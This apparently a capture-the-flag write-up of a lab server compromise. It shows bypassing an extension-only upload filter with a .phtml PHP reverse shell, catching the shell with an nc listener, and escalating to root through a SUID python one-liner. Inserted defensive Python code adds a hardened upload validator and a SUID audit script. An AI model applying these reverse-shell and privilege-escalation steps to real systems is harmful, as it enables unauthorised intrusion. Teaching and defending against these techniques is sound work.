Use RustScan to scan the server.
Now, let’s find some hidden directories with gobuster.
Uploading a reverse shell 💀
The upload section of the server is very weak: it only checks the file extension.
Download PenTestMonkey’s PHP reverse shell from here and edit it suitably (add your IP address and a port).
Now start a listener using
nc -lvnp 9090
You can use any port number (make sure to edit the reverse shell to match).
Now, when I tried to upload it, it didn’t work. So I tried changing the MIME type via BurpSuite, and that didn’t work either.
Then I tried prepending the GIF magic bytes (GIF87a). It uploaded, but when I opened it in the browser it was detected as an image and gave an error message.
So then I started brute-forcing which extensions were allowed. I found that every PHP extension except .php was allowed.
PHP has alternative extensions such as .php, .php1, .php2, .php3, .php4, .php5, .phtml
I uploaded the shell with the .phtml extension and it worked!
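To show why a denylist on the extension alone fails, here is an added example (not code from the original write-up, and written in Python rather than the server's PHP for illustration): the weak check the post describes next to a hardened check that uses an allowlist, ties each extension to the magic bytes the content must start with, rejects double extensions, and lets the server choose the stored filename. The filenames and byte strings below are constructed for the demonstration.

```python
# Added example, not code from the original write-up: a denylist-only upload
# check (the behaviour the post describes) next to an allowlist check that also
# inspects the file's content. Filenames and byte strings are constructed.
import os
import re
import secrets

# Weak check: only the literal ".php" extension is blocked, so .phtml, .php5
# and friends still pass. This is the gap the write-up exploits.
def weak_is_allowed(filename: str) -> bool:
    ext = os.path.splitext(filename)[1].lower()
    return ext != ".php"

# Hardened check: each permitted extension is tied to the magic bytes the
# content must start with, and the name must be a single plain stem.extension.
ALLOWED_TYPES = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}")

def hardened_is_allowed(filename: str, data: bytes) -> bool:
    base = os.path.basename(filename)
    # Exactly one dot: rejects shell.phtml.gif style double extensions.
    if not NAME_RE.fullmatch(base):
        return False
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False
    # The content must really start with the image's signature...
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False
    # ...and a valid header is not enough: "GIF87a<?php" is still a script
    # if the server ever executes the file, so reject PHP open tags anywhere.
    if b"<?php" in data or b"<?=" in data:
        return False
    return True

def storage_name(filename: str, data: bytes) -> str:
    """Server-chosen name: random token plus the allowlisted extension only,
    so a user-supplied name never decides how the web server handles the file."""
    if not hardened_is_allowed(filename, data):
        raise ValueError("upload rejected")
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return secrets.token_hex(16) + ext
```

Storing uploads outside the web root, or with PHP execution disabled for the uploads directory, is the complementary server-side control: even a file that slips past the validator is then served as data rather than run.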
Now navigate to
http://<SERVER-IP>/uploads/
and you will find your reverse shell.
Now stabilize the shell using
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo; fg
Privilege Escalation (Root) 🦾
Find SUID binaries using
find / -user root -perm /4000
You will find
/usr/bin/python there. It has the SUID bit set and is owned by root, so it can be exploited with
/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
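A SUID-root interpreter like this is the kind of thing a hardening audit should catch before an attacker does. As an added example (not code from the original write-up), the Python below does what the `find` command above does, then compares the result against a baseline of expected SUID binaries and flags any interpreter or shell carrying the bit. The baseline set, the `INTERPRETERS` list and the temporary-directory fixture in `run_demo` are all constructed for the demonstration.

```python
# Added example, not code from the original write-up: audit SUID binaries
# against a baseline and flag interpreters, which should never carry the bit.
# The fixture in run_demo() is constructed in a temporary directory.
import os
import stat
import tempfile

# Interpreters and shells execute arbitrary code by design; with SUID root set
# they hand out a root shell, as the write-up's /usr/bin/python shows.
INTERPRETERS = {"python", "perl", "ruby", "php", "node", "bash", "sh", "dash", "zsh"}

def find_suid(root="/", root_owned_only=True):
    """Return regular files under root with the SUID bit, sorted by path."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Do not descend into kernel pseudo-filesystems when scanning from /.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            if root_owned_only and st.st_uid != 0:
                continue
            hits.append(path)
    return sorted(hits)

def classify(paths, baseline):
    """Tag each SUID file: 'interpreter' if its name is a scripting engine
    (version suffix such as python3.10 stripped), else 'not-in-baseline' if
    it is absent from the expected set. Baseline entries produce no finding."""
    findings = []
    for path in paths:
        stem = os.path.basename(path).rstrip("0123456789.")
        if stem in INTERPRETERS:
            findings.append((path, "interpreter"))
        elif path not in baseline:
            findings.append((path, "not-in-baseline"))
    return findings

def run_demo():
    """Constructed fixture: python, passwd and newsuid are SUID, ls is not;
    only passwd is in the baseline. Returns (basename, kind) findings."""
    root = tempfile.mkdtemp()
    for name, mode in (("python", 0o4755), ("passwd", 0o4755),
                       ("ls", 0o755), ("newsuid", 0o4755)):
        path = os.path.join(root, name)
        with open(path, "wb") as f:
            f.write(b"#!/bin/sh\n")
        os.chmod(path, mode)
    baseline = {os.path.join(root, "passwd")}
    found = find_suid(root, root_owned_only=False)
    return [(os.path.basename(p), kind) for p, kind in classify(found, baseline)]

if __name__ == "__main__":
    # Real run: needs root to see every directory; baseline would come from
    # a known-good image of the same build rather than the empty set here.
    for path, kind in classify(find_suid(), baseline=set()):
        print(kind, path)
```

Running this periodically (or from a file-integrity tool) and alerting on any `interpreter` or `not-in-baseline` result turns the SUID check from a one-off pentest step into a detection; the fix for the finding on this box is simply `chmod u-s /usr/bin/python`.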
Thanks a lot for reading this article.